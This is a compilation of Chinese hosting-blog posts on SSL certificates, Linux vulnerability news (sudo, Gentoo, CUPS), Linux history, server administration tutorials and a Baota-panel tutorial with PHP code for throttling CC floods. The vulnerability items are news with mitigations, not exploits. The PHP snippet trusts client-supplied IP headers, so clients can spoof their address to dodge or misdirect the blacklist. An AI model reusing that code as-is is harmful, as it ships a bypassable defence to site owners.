1.3、SHA-256)和浏览器信任度完全一致,不存在 “免费证书安全性更低” 的问题。 均遵循 CA/B 论坛规范,确保证书签发流程合规。 总结:如何选择? 适合 Let's Encrypt 的场景:个人博客、测试环境、非商业网站,或需要通配符 / 多域名但预算有限的场景,优先考虑成本与灵活性。 适合收费证书的场景: 企业官网、电商平台、金融服务等需要用户信任的场景(尤其是 OV/EV 证书)。 缺乏技术能力管理证书续期,或需要专业支持与保险保障的组织。 需要复杂域名配置(如跨域名 SAN、大量子域名)且希望简化管理的场景。 未来趋势:随着证书有效期大幅缩短,自动化证书管理系统(如 ACME 协议、HashiCorp Vault)将成为企业刚需,无论选择免费还是收费证书,均需提前布局自动化续期策略以避免服务中断。 #### Let's Encrypt:因受漏洞影响 3月4日起将吊销部分TLS证书 3月5日 消息:昨日,Let's Encrypt向客户发布邮件称,将从 3 月 4 日起吊销约300万个TLS / TTS 证书。对此,Let's Encrypt建议用户及时更换证书,否则访客将跳转到证书失效的安全警告。 Let's Encrypt在邮件中称,新证书的续签流程,可以在 ACME 文档中找到。也可以通过官方工具来查看是否需要更新证书。 今年2月,Let's Encrypt曾表示,在CAA中发现一个漏洞,导致某些证书不能通过CAA认证。 据悉,CAA可以允许域管理员创建DNS记录,该记录使得网站所有者,仅授权指定CA机构为自己的域名颁发证书,以防止HTTPS证书错误签发。 资料显示,Let's Encrypt是一个由非营利性组织互联网安全研究小组(ISRG)提供的免费、自动化和开放的证书颁发机构(CA),为网站提供免费的TLS 证书。 #### Let’s Encrypt 支持申请免费泛域名SSL证书啦 菜鸟申请教程 Let's Encrypt是目前免费ssl证书应用最广泛的了,免费而且证书也被众多机构认可的。以前Let's Encrypt的证书只支持顶级域名申请,不过最近新出来泛域名SSL证书啦。这可急坏了那些靠收费生存的ssl证书服务商。今天我们来说下如何申请使用Let’s Encrypt泛域名ssl证书。 1 首先我们先登陆免费申请网址(这里说明网上有很多自动签发的教程了,主机吧这里说的是手动申请的,只需要申请下载证书然后上传安装到自己服务器上就行,比较适合小白) https://www.sslforfree.com/ 英语不好的可以下载个谷歌浏览器登陆然后自动翻译成中文 2 输入域名点创建免费的SSL证书 需要说明下泛域名申请是不带根域名的,所以我们需要在输入框输入根域名空格再输入*.域名的,比如主机吧的就输入 zhujib.com *.zhujib.com再点创建即可。 3 按照提示完成域名验证 4 进入域名解析,解析相关txt记录 主机吧的解析需要解析两条记录 如上图 _acme-challenge.zhujib.com添加值为_88cMS_r-D4BPeAwJNsRQMiLsNn6bx9x0-4jNw7ngN8的 TXT记录 _acme-challenge.zhujib.com添加值为ppnOr6oYL0I7v99lzL_8mum4oagXRiBmoBdsfexDGB8的 TXT记录 5 解析成功我们等解析验证通过,验证通过后即可下载SSL证书   需要注意的是由于域名原因ttl限制无法写1,导致更新时间慢了很多,所以验证通过比较慢,需要大家等验证生效了,才可以下载ssl证书,否则下载不了。 6,等待SSL证书生成,需要1分钟左右。   7。 得到证书并下载   以上就是手动申请Let’s Encrypt泛域名ssl证书了,有什么不懂的可以留言。有了证书可以自己部署到服务器上了,关于如何部署ssl证书,大家可以百度下《服务器如何部署ssl证书》应该有比主机吧写得更好的教程。 #### Linux sudo 高危漏洞(CVE-2025-32463)修复:可提权至 root 权限 7月2日讯 - 安全研究人员发现 Linux 系统中广泛使用的 sudo 命令存在一个严重安全漏洞(编号 CVE-2025-32463)。该漏洞允许攻击者将权限提升至最高的 root 级别,对系统安全构成重大威胁。科技媒体 borncity 于 7 月 1 日率先报道了这一漏洞及其修复情况。 漏洞详情: 根源问题: 漏洞源于 sudo 在特定条件下未能正确处理 /etc/nsswitch.conf 配置文件。 利用途径与危害: -host / -h 选项: 攻击者可以利用此漏洞,在结合 -host 或 -h 选项(通常用于远程命令执行)时,实现在远程主机上进行未授权的 权限提升。 -chroot / -R 选项: 当使用 -chroot 或 -R 选项时,该漏洞可能导致 任意代码执行。这直接绕过了 /etc/sudoers 文件设定的关键安全策略限制,该文件正是定义哪些用户能以何种权限执行 sudo 的核心策略文件。 严重性: 该漏洞被评为 9.3 分高危漏洞,凸显了其严重性。 受影响版本与修复: 受影响版本: sudo 1.9.14 至 1.9.17。 修复版本: 漏洞已在 sudo 1.9.17p1 版本中得到修复。强烈建议所有使用受影响版本的用户立即升级至此版本或后续安全版本。 #### Linux 发行版 Gentoo 被曝存在重大漏洞,黑客可进行 SQL 注入攻击 7 月 3 日消息,网络安全公司 SonarSource 在日前研究中发现,Gentoo Linux 发行版中存在漏洞 CVE-2023-28424,黑客可以利用该漏洞进行 SQL 注入攻击。 研究人员从 GentooLinux 的 Soko 搜索组件中找到了这个漏洞。该漏洞的 CVSS 风险评分为 9.1,属于特别重大漏洞,GentooLinux 开发团队已经于漏洞曝出 24 小时内进行了修复。 ▲ 图源 SonarSource ▲ 图源 SonarSource 据悉,Soko 组件是一个公共 API,在搜索系统中的软件包时,可以提供更高的效率,并可以进行软件源的错误跟踪和溯源。 ▲ 图源 SonarSource 该漏洞发生的原因,主要是“数据库组态配置不当”,即使是在套用了对象关系映射(Object-RelationalMapping)的情况下,攻击者依然可以利用该漏洞进行 SQL 注入,从而在受害者的设备上运行相应恶意代码,目前该漏洞已经被修复,感兴趣的小伙伴们可以在这里找到报告的更多内容。 #### Linux 曝“灾难”级漏洞:已存在 10 多年,影响几乎所有发行版,暂无补丁 近期,Linux 社区曝出了一个严重的远程代码执行(RCE)漏洞,该漏洞已存在约10年,影响几乎所有的 GNU/Linux 发行版。这个漏洞的破坏力极强,预估的 CVSS 评分达到了9.9分(满分为10分),表明其潜在的危害性极高。 目前,相关的修复补丁尚未发布,但用户可以采取一些临时措施来缓解风险,例如禁用或移除 cups-browsed 服务、更新 CUPS 安装以及阻止对 UDP 端口 631 的访问。 研究人员 Simone Margaritelli 首先在社交媒体上披露了这些 RCE 漏洞,并已通知相关开发团队。开发团队正在紧急处理此事,并计划在未来两周内完全披露漏洞详情。由于漏洞的复杂性和部分开发者对漏洞影响的争论,修复进度受到了一定影响。 Margaritelli 消息,目前没有修复补丁,用户可以尝试以下缓解方案:禁用或者移除 cups-browsed 服务更新 CUPS 安装,以便在安全更新可用时引入安全更新。阻止对 UDP 端口 631 的访问,并考虑关闭 DNS-SD。如果 631 端口无法直接访问,攻击者可能会通过欺骗 zeroconf、mDNS 或 DNS-SD 广告来实现攻击。 #### Linux 迎来29岁:回顾Linux 统治世界的历程 1991 年的 8 月 25 日,来自芬兰赫尔辛基大学的 Linus Torvalds 用 Minix 操作平台建立了一个新的操作系统内核,并把它发回 Minix Usenet 新闻组。 此时,年仅 21 岁的大学生 Linus 不会意识到,自己当做兴趣爱好开发的一个小项目会在 29 年后发展成统治世界的庞大操作系统内核。 在 Linux 正式对外公布的 29 周年之际, ZDNet 资深编辑 Steven J. Vaughan-Nichols 整理了 Linux 29 年历史所经历的重大事件。 下面就让我们一起来看看 Linux 如何一步步从一个大学生的业余爱好成长为今天这个庞大的操作系统内核。 Linux 29 年历史重大事件整理 By Steven J. Vaughan-Nichols 1991 年 — Linus Torvalds 向全世界介绍 Linux 图中这条消息是在 1991 年 8 月 25 日发回 Minix Usenet 新闻组的。当 Linus Torvalds 在谈到他的新的免费操作系统时,他并不知道自己写的这个东西会在未来变成什么 他写道:“ 这只是出于我的个人爱好,不会像 GNU 那样成为 386(486) AT 克隆的那样大而专业的系统。" 1992 年 — Linux 面临的第一次战争 操作系统大师、Unix 的教育操作系统版本 Minix 的创造者 Andrew Tannenbaum 宣称 “Linux 已经过时了”,Linux 面临的第一次操作系统战争开始了。 在由此引发的讨论中,Linus Torvalds 对他对 Linux 的愿景做了一个很有说服力的评论,这个评论在今天仍然是正确的,“ 如果 GNU 内核(另一个创建类似 Unix 的自由操作系统的项目)在去年春天就已经准备好了,我甚至不会费心去启动我的项目。 然而事实是,它没有,现在仍然没有。Linux 在现在可用的点上赢得了很大的优势。" 1993 年 — Slackware Linux 发行 早期有一些 Linux 发行版,如 MCC 和 Yggdrasil Linux,但 Patrick Volkerding 的 Slackware 是第一个广泛成功的 Linux 发行版,它至今仍在更新和使用。 1993 年 — Debian Linux 诞生 Debian Linux,流行的社区版 Linux,是由它开始的。今天,它是 Mint、Ubuntu 和许多其他流行的 Linux 发行版的基础。 1994 年 — 红帽公司成立 Marc Ewing 创建了红帽 Linux。Bob Young 收购了 Ewing 的公司,将其与自己的公司合并,并组建了红帽,这是迄今为止最成功的 Linux 公司。 1995 年 — 首届 Linux 博览会开幕 这一年,Linux 有了第一个贸易会议,Linux 博览会。之后还诞生了更多的展会。今天,仅在美国就有十多个主要的地区性和全国性的 Linux 贸易展。 1996 年 — 首个 Linux 桌面界面诞生 KDE 是第一个主要的 Linux 桌面界面,它于 1996 年由 Matthias Ettrich 创造。Matthias Ettrich 之所以创办它,是因为他想做一个易于使用的桌面。KDE中的 “K” 是 “Kool” 的意思。这个名字也是 Unix 的通用桌面环境(CDE)的一个近似变换。 1996 年 — SUSE Linux 发布 同样在 1996 年,在 Slackware 和红帽 Linux 合作后,欧洲顶级商用 Linux 厂商 SUSE 发布了其首款独立 Linux 发行版。如今 SUSE 依然是 Linux 和云计算领域的重要厂商。 1997 年 — GNOME Miguel de Icaza 和 Federico Mena 开始着手开发一个新的 Linux 桌面,命名为 GNOME 。该桌面完全基于自由软件构建。GNOME 与 KDE 一起,将成为 Linux 最重要的两个桌面之一。 1998 年 — 微软的“万圣节文件” Linux 的快速发展引起了专有操作系统巨头微软的重视。早期的 Linux 和开放源代码负责人 Eric S. Raymond 透露了一份来自微软内部的万圣节文件,该文件表明微软正认真对待 Linux 带来的市场威胁,将其视为竞争对手,并开始制定其反开放源代码和 Linux 运动的计划。 然而十年后,微软将改变自己的腔调。 1999 年 — Corel Linux 桌面 Corel 发布了第一个主流 Linux 桌面。虽然不成功,但它将为其他流行的 Linux 桌面发行版铺平了道路,例如后来 Ubuntu 。 1999 年 — Linux 与微软 Windows 首次正面对决 Linux 首次在文件服务方面与 Windows NT 进行了基准测试。Linux 赢了。Linux 与 Windows 服务器操作系统的战争开始了。Linux 最终获胜。今天,Linux 在网络服务器和云计算领域都占据了主导地位。 2000 年 — IBM 向 Linux 投资 10 亿美元 在这一年,IBM 宣布将在 2001 年向 Linux 投资 10 亿美元。这将被证明是 IBM 有史以来最好的投资。通过此举,IBM 也打破了 Linux 在企业市场的僵局。 2001 年 — Linux 2.4 版本发布 经过一段时间的延迟,Linux 2.4 发布了。有了这个版本,Linux 成为与 Solaris 和其他高端服务器操作系统竞争的对象。 2003 年 — SOC 与 Linux 开战 由旧的 SCO Unix 公司和 Caldera Linux 业务组成的 SCO 系统出现,但 SCO 背弃了自己的Linux 历史,起诉 IBM 和其他公司,试图证明 Linux 是 Unix 的复制品。该公司失败了,但在一段时间里其 FUD 一直阻挠着 Linux 的商业接受度。 2004 年 — Ubuntu 来了 Ubuntu 诞生了。在 Debian Linux 的基础上,Ubuntu 成为了一个非常流行的 Linux 桌面操作系统,也是所有云 Linux 发行版中最重要的一个。 2004 年 — Linux 统治超级计算机 此时,在世界上最快的超级计算机中,超过一半运行着 Linux。到了 2017 年,所有的超级计算机都将运行 Linux。 2005 年 — Linux 商业化的成功 Linus Torvalds 首次出现在了《商业周刊》的封面上,打破了人们对 Linux 成为主要商业参与者的任何怀疑。广告语是什么?Linux Inc. 今天,你很难找到任何不在 Linux 上运行的大型企业。 2007 年 — 基于 Linux 打造的 Android 系统诞生 包括谷歌和众多硬件厂商在内的开放手机联盟宣布推出 Android 系统。它将成为最受欢迎的移动端用户操作系统,因为它在超过 10 亿部智能手机上运行。 2008 年 — 证券交易所系统转移到 Linux 纽约证券交易所改用 Linux 作为核心操作系统,这一举措很快就被世界上许多其他主要证券交易所效仿。Linux 并没有成为大生意,Linux 本身就是大生意。 2011 年 — 谷歌推出 Chromebook 谷歌推出首款 Chromebook,CR-48。它运行基于 Gentoo-Linux 的 ChromeOS。到 2015 年,Chromebook 在教育市场等轻办公领域的销量已经超过了 Windows 笔记本。 2012 年 — 云运行在 Linux 之上 IT 产业开始从服务器和数据中心转移到云端,而云端设备运行在 Linux 上。到 2019 年,即使在微软 Azure 上,微软客户的虚拟机(VM)实例也有一半以上运行 Linux。 2012 年 — 红帽身价达到 10 亿美元 红帽成为第一家十亿美元的开源公司。2016 年,它成为第一家价值 20 亿美元的 Linux 企业。 2014 年 — 微软 “示爱” Linux 微软新任 CEO Satya Nadella 宣称,“ 微软热爱 Linux ”。随后,微软通过在云端和内部部署支持 Linux 和开源软件来证明这一点,逐渐走上拥抱开源之路。 2018 年 — 微软将其专利组合开源 这可能是微软有史以来最激进的支持开源的举动,微软将其整个专利组合向开放发明网络(OIN)开源专利联盟的成员开放。OIN 是为 Linux 的所有专利进行辩护的非营利组织。 2019 年 — 微软为 Windows 10 用户推出 Linux 微软紧接着为 Windows 10 用户推出了自己的原生 Linux —— Windows Subsystem for Linux 2.0。有了它,人们可以将 Linux 与 Windows 同时运行。 2019 年 —— IBM 斥资 340 亿美元收购红帽 红帽被 IBM 以 340 亿美元收购,成为有史以来最大的软件收购案。从 IBM 的这一举动不难看出Linux 如今在科技界的主导地位。 2020 年 —— Linux 统治云计算 全球云计算市场每年超过 1000 亿美元。其中 90% 的云端设备运行在 Linux 上。 现在,Linux 与开源社区的故事仍在继续…… #### linux/centos云服务器硬盘挂载(图文教程) Linux磁盘挂载是比较常见的管理操作之一。一般云服务器商预装的linux系统有2块盘,一块为系统盘,另外一块磁盘是数据盘,默认没有挂载,需要手动挂载到系统中。具体操作是:需要对磁盘进行格式化,格式化后挂载到需要的挂载点,最后还需要添加分区启动表,以便下次系统启动随机自动挂载。 详细操作步骤为: 1、首先查看系统中磁盘信息,命令为:fdisk -l 输入后显示的:"Disk /dev/vda: 21.5 GB",即为系统盘,名称为vda,另外还有一块磁盘是没有格式化,没有分区,没有在使用中的:"Disk /dev/vdb: 32.2 GB",如图1所示: 图1 2、将未使用的磁盘进行格式化,操作数据盘符前,请自行确认磁盘是否有使用过,如有重要数据请谨慎操作,以免导致数据丢失,带来不必要的麻烦。具体格式化命令为: mkfs.ext3 /dev/vdb 如图2所示,即为正在格式化中。这个时候请耐心等待格式化完毕。 图2 3、将格式化完的磁盘进行挂载,挂载前,先在服务器上创建一个需要挂载的挂载点,如可以在根目录下创建一个wwwroot目录。创建目录命令为: mkdir /wwwroot 挂载磁盘到wwwroot目录,挂载命令: mount /dev/vdb /wwwroot/ 4、修改fstab,以便系统启动时自动挂载磁盘,编辑fstab默认启动文件命令: vi /etc/fstab 回车在其中添加一行: /dev/vdb /wwwroot ext3 defaults 0 0 如图3所示,在fstab中添加的一行,添加后,保存。 图3 然后如图4所示,输入:sync 将缓存写入服务器,并执行:init -6 进行优雅重启服务器。 图4 5、重启服务器后,输入命令: df -lh 查看第2块磁盘是否有正常挂载,正常情况您会看到如图5所示,这样第2块盘就挂载好了。 图5 #### Linux5.3将停止维护:用户被劝告升级到Linux内核5.4 Linux内核5.3.18是该系列的最后一个版本。Linux 5.3内核系列已走到了尽头,它将不再收到修复重大安全问题或错误的维护更新版。著名的Linux内核开发人员Greg Kroah-Hartman近日宣布发布Linux 5.3内核系列的第18个维护更新版(版本5.3.18),该更新版总共更改了59个文件,共有369处插入和329处删除。然而这位开发人员还特别指出这一点:这将是Linux内核5.3系列的最后一个更新版,现在Linux内核5.3寿终正寝。Greg Kroah-Hartman在邮件列表公告中称:“我宣布发布5.3.18内核。注意,这是最后一个5.3.y内核版本。现在它走到了尽头。请赶紧升级至5.4.y。5.3内核系列的所有用户必须升级。可以在https://git.kernel.org/?p=linux/kernel/git/stable/linux-stable.git;a=summary找到更新后的5.3.y git树。”用户被劝告升级到Linux内核5.4 无论你是Linux用户还是Linux OS供应商,都强烈建议你考虑将操作系统升级到Linux 5.4内核系列的最新版本。如果目前做不到这点,至少应升级到Linux内核5.3.18。可以从kernel.org下载这两个版本,但是需要手动编译和安装它们。因此,我们建议从Linux内核5.3升级之前,等待Linux 5.4内核软件包进入到你青睐的GNU/Linux发行版的稳定软件存储库。Linux内核5.4带来了许多出色的新功能,其中包括支持微软的exFAT文件系统这项期待已久的功能以及人们期盼已久的“锁定”安全功能。 #### LINUX云服务器/VPS主机远程登录教学 很多站长都知道远程登陆windows服务器,却不知道如何远程登陆linux系统的,这里我们给大家做个教程。 linux系统都是通过指令来操作的,没有图形界面,可以通过ssh登陆管理,首先下载ssh登陆客户端,我司提供的是putty,下载地址: http://downinfo.myhostadmin.net/putty.exe    (注意:网上流传的中文版有后门,建议直接使用我司提供的英文版) 登陆流程: 1、输入IP地址,如果是共享IP的请输入远程连接的IP 2、输入端口,一般保持默认(22000),如果是共享IP的请输入远程连接的端口 3、点击“打开”。如图: 对应中文说明如图: 输入账号root,输入密码,登陆到linux。如图: #### Linux云服务器如何挂载硬盘分区 这篇文章主要介绍了Linux 服务器硬盘挂载分区的方法,主机吧觉得挺不错的,现在分享给大家,也给大家做个参考。格式化完成以后需要对分区进行挂载,相当于Windows系统下分配盘符,没有挂载的分区是不能使用的。建立挂载点mkdir -p /mnt/yanxiaoyy使用mount命令挂载sdb1到此目录mount /dev/sdb1 /mnt/yanxiaoyy df -hT /dev/sdb1Filesystem   Type Size Used Avail Use% Mounted on/dev/sdb1   ext3 2.0G  68M 1.9G  4% /mnt/yanxiaoyy卸载命令umountumount /mnt/yanxiaoyy df -hT /dev/sdb1Filesystem   Type Size Used Avail Use% Mounted on -       -   492M 260K 491M  1% /dev编辑/etc/fstab文件实现自动挂载在最后一行增加如下代码:设备名称—挂载点—类型—defaults—0 0/dev/sdb1        /mnt/yaoxiaoyy     ext3  defaults    0 0重启系统检查磁盘信息,sdb1已自动挂载 df -hT /dev/sdb1Filesystem   Type Size Used Avail Use% Mounted on /dev/sdb1   ext3 2.0G  68M 1.9G  4% /mnt/yanxiaoyyp.s.理论上,分区可以挂载到系统的任意位置,但Linux系统提供了三个挂载目录(均为空目录)供用户使用,分别是:/mnt,/media,/misc。一般,/mnt用于挂载硬盘和U盘等存储设备, /media用于挂载光盘、DVD等多媒体设备, /misc用于挂载杂项和其他比较少见的设备,如磁带机。挂载点必须存在,即在挂载之前必须先建立相应的空目录。通过mount命令手动挂载的分区在系统重启之后会失效,需要编辑/etc/fstab文件使分区在重启之后能自动挂载。以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持主机吧。 #### linux云服务器如何查看是否开启IPV6 自从AppStore要求必须支持IPv6后,国民感到震惊的同时,也加速了国内的ipv6的普及。如何查看服务器是否开启了IPV6呢?今天我们教大家linux服务器如何确认IPV6是否开启: 方式1:使用ifconfig查看自己的IP地址是否含有IPv6地址。 方式2.查看服务监听的IP中是否有IPv6格式的地址。(netstat -tuln) 开启IPV6: vim /etc/sysctl.conf vim /etc/modprobe.d/disable_ipv6.conf vim /etc/sysconfig/network 至此ipv6的服务器端支持已经完成,重启服务器测试是否支持ipv6,重启后, ifconfig查看ipv6的信息,有看到有关IPV6的输出就可以 #### Linux史上最重大的版本: 内核 5.8 今天发布了 在最新的更新中,Linux内核5.8版本引入了众多的驱动程序支持、安全改进和优化。Linux之父Linus Torvalds确实在Linux 5.8 RC1版本中提到了这一点: 不过,5.8仍然是最好的,尽管它没有任何一项脱颖而出的功能特性。是的,驱动程序方面确实有几个重大的变化(habanalabs和atomisp),但它不像过去另外一些重大版本那样以单方面见长。 Linux内核5.8的主要变化虽然被视为最重大的版本之一,但许多技术变化一目了然。下面重点介绍对最终用户最重要的几项重要功能特性。•Adreno 405/640/650 GPU开源驱动程序支持Linux 5.8对开源MSM驱动程序(Freedreno)进行了更新,现在该驱动程序支持高通的Adreno 405、640和650 GPU。对于台式机Linux而言这并不是很重要,但是您可以在骁龙855+和骁龙865(Galaxy S20智能手机搭载)等一些最新的片上系统(SoC)上找到这些移动GPU。•经过改进的Radeon驱动程序支持 AMD一直在努力改进最新Linux内核5.8上的GPU支持。除了性能方面的一些改进外,您还会发现,借助Linux 5.8上AMDGPU内核驱动程序的TMZ(可信任内存区域)支持,加密的vRAM已被启用。别忘了,驱动程序在处理严重的散热故障方面也有了改进。换句话说,如果您的AMD GPU超出安全温度限制,驱动程序将关闭GPU,以防显卡受损。•修复Spectre漏洞的补丁 很显然,面对其芯片组中的安全漏洞,英特尔做得不够。不过,Linux在处理Spectre漏洞的措施方面看来已做了一些重要的变化。我不是这方面的专家,但是实施的缓解措施看起来影响了AMD CPU,原因不明。因此,补丁必不可少。这一更改也被向后移植到了稳定版中。•支持POWER10处理器 POWER10是即将在2021年推出的IBM + OpenPOWER处理器。它将使用7纳米工艺进行制造,旨在对POWER9微型架构进行重大改进。•新的Arm SoC支持 虽然我前面提到了支持现代移动SoC上的开源驱动程序,但是就Linux 5.8而言,该版本似乎支持一些新的板卡(或SoC),比如Realtek RTD1195。•推出AMD Energy驱动程序 如果您有Zen/Zen2 AMD CPU,会很高兴知道:Linux 5.8版本终于有了AMD Energy驱动程序!这样一来,您便可以获得Zen/Zen2 CPU上每个插槽/每个核心的能耗报告,而这些数据以前是无法得知的。这对于很想知道CPU功耗的用户很有用。•exFAT驱动程序的改进 尽管Linux 5.7添加了exFAT文件系统驱动程序,三星也在Linux 5.8上进行了一些优化改进和修复。•改进的DAX支持 如果您喜欢使用英特尔的Optane内存来加快系统运行速度,改进的DAX代码将使持久性内存可以直接访问文件,无需页面缓存。因此,Linux 5.8将充分利用该功能。如果您想了解更多信息,建议您阅读有关英特尔Optane DC持久性内存的一篇文档(https://www.phoronix.com/scan.php?page=article&item=linux-58-features&num=1)。•改进的Thunderbolt支持 看起来在Linux 5.8中,我们还将看到对非x86系统的Thunderbolt支持(ARM支持)。除此之外,您还将注意到针对英特尔Tiger Lake的Thunderbolt支持。当然,还有另外一些USB改进,比如USB Type-C驱动程序更新。•Linux内核5.8的其他变化 Linux内核5.8确实是一个重要版本,它有许多驱动程序更新、安全改进和性能优化。如何获得内核5.8?正如过去解释的那样,大多数Linux发行版都不提供最新的内核。像Arch这样的滚动版本可能很快会推出,但专注于稳定性的发行版(比如Debian或Ubuntu)不会对所有用户发布。这并不意味着您就无法在Ubuntu或Debian中获得内核5.8。如果您确实需要,又比较了解Linux命令行,可以在Ubuntu中手动升级到最新的主线Linux内核,但前提是您熟悉这方面,不建议所有人都这么做。 #### Linux官方提供邮件托管服务啦 今天 Linux.org 官网发出公告,表示将和 Migadu 合作在 linux.dev 域名下提供邮件托管服务。目前该服务处于 Beta 测试状态,目前仅向 MAINTAINERS 文件中的内核开发者提供。不过官方维护团队表示后续希望能够为其他所有证明对 Linux 内核有持续贡献的人(patches, git commits, mailing list discussions等)提供服务。 在公告中写道: Linux 的发展依赖于发送和接收电子邮件的能力。不幸的是,企业网关通常会对发出和收到的邮件进行后处理,目的是添加冗长的法律免责声明或执行反钓鱼链接隔离,这两种情况都会干扰正常的补丁流程。 虽然可以对 GMail 等免费选项进行配置,使其在发送和接收补丁时工作良好,但Google服务可能并非在所有地理区域都可用--或者可能有其他原因,例如某人可能不愿意使用 gmail.com 地址。 出于这个原因,我们与 Migadu 合作,在 linux.dev 域名下提供邮件托管服务。如果你是一个 Linux 子系统的维护者或审查者,你需要一个邮箱来完成你的工作,我们应该可以帮助你。 我们希望在不久的将来能将这项服务扩展到其他内核开发者。 #### Linux宝塔面板 防CC攻击教学 前言 CC攻击是目前互联网上最常见的攻击方式,具有成本低,效果好的优点,往往几百块钱就可以攻击你一周,让你网站痛不欲生。 本教程只防CC攻击,不能防DDOS,防DDOS请购买百度云加速或高防IP解决。 实测:1核1G内存撑住700多代理IP持续攻击,屹立不倒,且CPU在45%左右徘徊。 本教程借助根据CPU/内存大小 优化LNMP环境配置,且使用了类似cfCDN的防CC攻击特点并做了一些优化 什么是CC攻击 攻击者借助代理服务器生成指向受害主机的合法请求,实现DDOS和伪装就叫:CC(ChallengeCollapsar)。 CC主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库压力就越大,被访问的频率也越高,占用的系统资源也就相当可观。 一个静态页面不需要服务器多少资源,甚至可以说直接从内存中读出来发给你就可以了,但是论坛就不一样了,我看一个帖子,系统需要到数据库中判断我是否有读帖子的权限,如果有,就读出帖子里面的内容,显示出来——这里至少访问了2次数据库,如果数据库的数据容量有200MB大小,系统很可能就要在这200MB大小的数据空间搜索一遍,这需要多少的CPU资源和时间?如果我是查找一个关键字,那么时间更加可观,因为前面的搜索可以限定在一个很小的范围内,比如用户权限只查用户表,帖子内容只查帖子表,而且查到就可以马上停止查询,而搜索肯定会对所有的数据进行一次判断,消耗的时间是相当的大。 CC就是充分利用了这个特点,模拟多个用户(多少线程就是多少用户)不停的进行访问(访问那些需要大量数据操作,就是需要大量CPU时间的页面).这一点用一个一般的性能测试软件就可以做到大量模拟用户并发。 你是否受到了CC攻击 1.网站访问缓慢,报503错误(nginx拒绝连接),502错误(php挂逼) 2.服务器CPU 100%; 基本上确诊被C了。 LNMP环境优化 1.nginx优化:nginx没有过多的优化,一般nginx都死被php拖死的。简称:扶不起来 2.宝塔中nginx的防火墙试效果并不理想,主机吧用过几次,都是帮客户设置的,完全没用,而且有误杀几率视乎有点高。 3.php优化:服务器挂壁基本都是php进程太多导致的了。nginx是个传菜的,php就是真正花时间吃饭的。 4.如图:简单理解,最少15个人在厂里,最多50个人同时干活,如果有35个人以上没干活就开除掉。 5.根据CPU核数设定起始进程数和最小空闲,这样可以发挥正常状态的最大优势,加快处理速度 设置为15*核数 ,即1核15进程,双核30进程。 6.根据内存设置最大进程,防止出现内存爆炸,导致fpm挂起或者mysql等其他服务挂逼。设置为1G*(40-50),即1G内存40-50,2G内存80-100。 7.设置上面两项可以更有效率的使用服务器。 8.如上设置并不能防止CC攻击,但是为我接下来需要说的提供了前提。 redis + 验证码 + 策略 防CC 采用redis高性能数据库,合理的访问策略验证并在超大攻击时开启验证码访问。让网站远离CC 1.安装redis,在宝塔软件管理找到,安装; 2.安装php redis扩展,你用哪个php就安装哪个php的扩展,别装错了; 3.在网站入口,如Wordpress的index.php 头部加入如下代码: header('Content-Type: text/html; charset=UTF-8'); //emlog原有代码,复制下列代码放在下面 //CC攻击停止后会尽快解除验证码,回到正常状态 //防CC配置$IPmax = 30; //开启验证码条件 值>=php最大进程数,适当设置更大会降低验证码触发条件,但会增大502错误几率(php挂起) $IPfor = 60; //周期 这个值基本不用动 $IPban = 60; //扔入黑名单 60秒内访问超过60次即拉黑IP $banTime = 3600*24; //黑名单时长 扔小黑屋时长,这种代理IP放一天感觉都少了 = =! $ip = ip(); //连接本地的 Redis 服务$redis = new Redis();$redis->connect('127.0.0.1', 6379); //拦截黑名单if($redis->exists($ip.'ban')){ exit('您被关进了小黑屋,黑白网丨HeiBai.Org');} //扔黑名单检测if($redis->get($ip.'ok') >= $IPban){ $redis->setex($ip.'ban', $banTime, '1');} if($redis->exists($ip.'ok')){ $redis->incrby($ip.'ok',1); //记录IP 自增1}else{ $redis->setex($ip.'ok',$IPfor,1);} //按需开启防CC 小黑屋IP不会触发该条件,所以当一段时间以后就会解除验证码。除非攻击者换一批代理继续攻击。如此往复if(count($redis->keys("*ok")) > $IPmax){ //验证 if($_COOKIE['key'] == ''){ if($_GET['cc']){ $key = md5($ip.$_GET['cc']); setcookie("key",$key); } } //拦截代码 if($_COOKIE['key'] && $_COOKIE['cc'] && $_COOKIE['key'] == md5($ip.$_COOKIE['cc'])){ //通过 }else{ if($_GET['cc']){ $key = md5($ip.$_GET['cc']); setcookie("key",$key); }else{ $cc = rand(1000,9999); setcookie("cc",$cc); //这里只是简单的构造了一下验证码,有能力可以自己更改的更安全和完美。 echo '<!DOCTYPE html> <html> <body> <form action="">请输入:'.$cc.' :<input type="text" name="cc" value=""><input type="submit" value="继续访问"></form> <p>访问异常,请输入验证码。</p> </body> </html>'; } exit(); }}function ip() { if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $ip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $ip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $ip = $_SERVER['REMOTE_ADDR']; } $res = preg_match ( '/[\d\.]{7,15}/', $ip, $matches ) ? $matches [0] : ''; return $res;} 如果不会技术怎么办? 那也没事,直接接入百度云加速防护,进入安全功能-ADS-CC防护,直接启用强力防护。 #### linux宝塔面板如何安装部署JAVA项目 国内卖JAVA虚拟主机的服务商很少,而且都非常贵,都快赶上云服务器的价格了,所以我们可以直接买个云服务器,然后安装linux宝塔面板,再安装JAVA运行环境即可。通过宝塔面板部署Java还是很方便的,至少不需要自己输入tomcat之类的安装命令了。 在部署java项目前,主机吧还是先说下目前的系统环境,基本环境差不多就行,不需要一定一样。 1、服务器用的是百度云 2、系统是CentOS Linux 7.5.1804 3、安装了如下软件 Apache 2.4.39 MySQL 5.5.62 PHP-7.0 好了,主要环境就是这些了,下面开始讲解如何部署java项目。 1、安装Java项目管理器,在宝塔面板的软件商店,我们输入“Java”,注意第一个字母一定要大写,小写是搜不到的 2、单击,操作中的“安装”,然后点“确定”按钮。 3、安装还是非常快的,安装成功后,我们让它首页显示。 4、单击设置操作,我们在Java项目管理器中的版本管理中安装下tomat8,tomcat7.0版本对应得 jdk 是1.7版本,tomcat8.0版本对应得 jdk 是1.8版本 